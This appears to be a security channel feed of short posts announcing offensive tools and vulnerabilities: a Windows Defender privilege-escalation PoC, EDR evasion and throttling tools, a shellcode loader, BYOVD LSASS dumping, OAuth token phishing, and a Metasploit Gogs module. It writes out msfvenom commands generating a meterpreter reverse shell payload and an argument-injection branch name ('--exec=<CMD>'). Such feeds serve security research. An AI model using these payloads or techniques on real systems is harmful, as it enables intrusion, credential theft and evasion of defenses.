reconcore

RoguePlanet

Windows Defender LPE. The exploit is a race condition, so it's a hit or miss. I have managed to get a 100% success rate on some machines while it struggled to work on others. The exploit has been tested in Windows 11 (Official channel + Canary) and Windows 10 with june 2026 patch installed. The PoC however does not work in Windows Server since standard users cannot mount an ISO image, I'm confident that all Windows Server versions are vulnerable as well, you just need to redesign the exploit.

#vulnerability #race_condition #lpe #poc @reconcore

BOF Cocktails in Cobalt Strike: Instrumenting BOFs with BEACON_INLINE_EXECUTE and Crystal Palace Original text: “BOF Cocktails in Cobalt Strike” — Rasta Mouse, rastamouse.me (05 Jun 2026). Code blocks and the screenshot below are reproduced verbatim from the source with attribution.

Post-exploitation Beacon Object Files (BOFs) historically inherited their evasion posture from whatever agent or loader executed them. If the loader took care of unhooking, masking,…

#redteam #bof @reconcore

QuadRF lets you directly explore the RF environment around you. See where signals are, the way they propagate, and how antennas and the surrounding environment interact. At 30 fps, you can map WiFi devices in a room, quadcopters in the sky, or other wireless transmitters. Expanding beyond vision and LiDAR, your robots can use QuadRF to gain real-time spatial awareness of surrounding radio beacons and access points. #rf #sdr @reconcore

DLL Hijacking Vulnerability Scanner

SearchAvailableExe is a comprehensive security research tool designed to identify and analyze DLL hijacking vulnerabilities in Windows executable files. This tool systematically scans signed executables to find potential DLL hijacking opportunities, making it valuable for security researchers, penetration testers, and system administrators.

#pe #re #dll #injection #analysis #binary #vulnerability #scanner #hijacking #security #research @reconcore

FirewallXPL-Forge

Perimeter security exploitation framework — 164 modules covering FW, NGFW, UTM, WAF, VPN, NAC, LB, and OT/ICS firewalls (Fortinet, Cisco, Palo Alto, F5, Citrix, Check Point, SonicWall, Ivanti, Siemens, Moxa, +13 vendors). GPU-accelerated, ML-driven, async concurrency, Rich TUI.

#python #firewall #penetration_testing #pentest #ngfw #exploitation #framework #redteam #ics #security #vulnerability #scanner #waf #bypass #vpn #exploit #ot @reconcore

Shellcode-EDR-Evasion-Loader

shellcode loader with XOR encryption and EDR evasion techniques. for security research and authorized testing only.

payload:

msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin

reverse shell:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin

#shellcode #loader #windows #security #edr #evasion @reconcore

c2detect

C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel

cognis.digital #python #cli #automation #infosec #pentest #offensivesecurity #redteam @reconcore

EDRChoker Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated from their server they lose much of their capability, and administrators can no longer collect or monitor logs from those agents. EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect they will consistently time out due to the extremely low bandwidth. Blog: https://www.zerosalarium.com/2026/06/edrchoker-choking-telemetry-stream-block-edr.html In this article I present a technique for interfering with the client–server connection of an EDR. It’s different from EDR connection-blocking methods that use the Windows Firewall or the Windows Filtering Platform (WFP).

CVE-2026-0826: Unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones (RCE as root) Vulnerable: VVX 150, VVX 250, VVX 350, and VVX 450), as well as Trio IP Conference series (Trio 8800, Trio 8500, and Trio 8300). Blog: https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/

Hidden HTTP/2 Bomb * FOR nginx, Apache httpd, Microsoft IIS, Envoy, Cloudflare Pingora * WriteUP + LABs + PoCs

DarkReplica (CVE-2026-23631) Redis Post-Auth RCE Exploit

The full technical writeup can be found here: https://www.zeroday.cloud/blog/redis-cve-2026-23631-dark-replica

#cve #redis #technique #rce @reconcore

One Click, One Hash: Unpatched NTLM Coercion in Windows Search URI Handler Original text by Andrew Schwartz Key Takeaways Same bug class. No CVE. No fix. The NTLM coercion primitive in the Windows search: URI handler is technically identical to CVE-2026-33829 in the Snipping Tool. Same severity rating, same mechanism, same potential impact. Microsoft closed it without a CVE or a patch, describing its triage process as… https://core-jmp.org/2026/06/one-click-one-hash-unpatched-ntlm-coercion-in-windows-search-uri-handler/

ssh-keysign-pwn — CVE-2026-46333 A critical race condition flaw in pre-31e62c2ebbfd Linux kernels. Due to a window during process exit where the memory management structure is cleared before file descriptors are closed, an unprivileged user can use pidfd_getfd(2) to steal open file descriptors of privileged processes, enabling unauthorized reading of root-owned files. 🔗 Exploit: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn 🔗 Source: https://blog.qualys.com/vulnerabilities-threat-research/2026/05/20/cve-2026-46333-local-root-privilege-escalation-and-credential-disclosure-in-the-linux-kernel-ptrace-path #linux #kernel #privesc #racecondition #pidfd

CVE-2026-41089 Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow CVSS 9.8 CRITICAL #vulnerability #rce #cldap #poc @reconcore

MalGitApp

A simple OAuth App designed to capture OAuth tokens when users authenticate through GitHub OAuth flow.

The Phishy GitHub Issue Case

Developers have become a primary target for threat actors. The reason is simple and can be easily understood : they are the backbone of software you are using. They are the one publishing code that will execute on your machine when developing, in your CI/CD pipelines and on the servers in production. This type of attack is called “Supply Chain Attack”, where the attackers target the suppliers in order to compromise organizations or individuals. Basically, they compromise the third-parties to reach their main target (or hit at scale). Some of the recent examples of such attacks are involving Axios and LiteLLM with their 100M downloads per week each.

#phishing #oauth @reconcore

BYOVD and Looting LSASS in the Modern EDR Era In today’s post, we will be uncovering the internals of kernel driver vulnerabilities and how to leverage them via the BYOVD (Bring Your Own Vulnerable Driver) method of attack. We will use kernel access to disable PPL for the LSASS process and then proceed to dump the process to disk, XOR’ing it beforehand so it avoids detection by popular EDR solutions. https://github.com/g3tsyst3m/CodefromBlog/tree/main/2026-5-29-BYOVD%20and%20Looting%20LSASS%20in%20the%20Modern%20EDR%20Era

EDR Tradecraft: Internals, Detection, Evasion & Advanced Research

Technical reference on modern EDR architecture, detection mechanisms, evasion techniques, and reverse-engineering methodology. Covers kernel callback APIs, file-system mini-filters, ETW providers, the four detection-engine model, syscall gates (FreshyCalls, RecycledGate, SysWhispers4, Acheron, Sysplant), sleep obfuscation (Ekko, FOLIAGE, DreamWalkers), call-stack spoofing (SilentMoonwalk, VulcanRaven), ETW-TI hardware-breakpoint bypass, patchless AMSI bypass via VEH, BYOVD against the vulnerable-driver blocklist, and the eight-phase EDR research methodology.

#research #technique #methods #re #evasion #edr @reconcore

metasploit-framework Add Gogs rebase RCE exploit module Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).

The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase.

Authenticated RCE via Argument Injection in Gogs

Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical).

#vulnerability #rce #metasploit #exploit @reconcore

metasploit-framework Add Gogs rebase RCE exploit module Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).

The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase.

Authenticated RCE via Argument Injection in Gogs

Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical).

#vulnerabilities #rce #metasploit #exploit @reconcore

Echolalia is a Windows transport layer for Sliver.

It profiles outbound traffic from a legitimate process and shapes C2 beacons to follow the same packet-size and timing profile.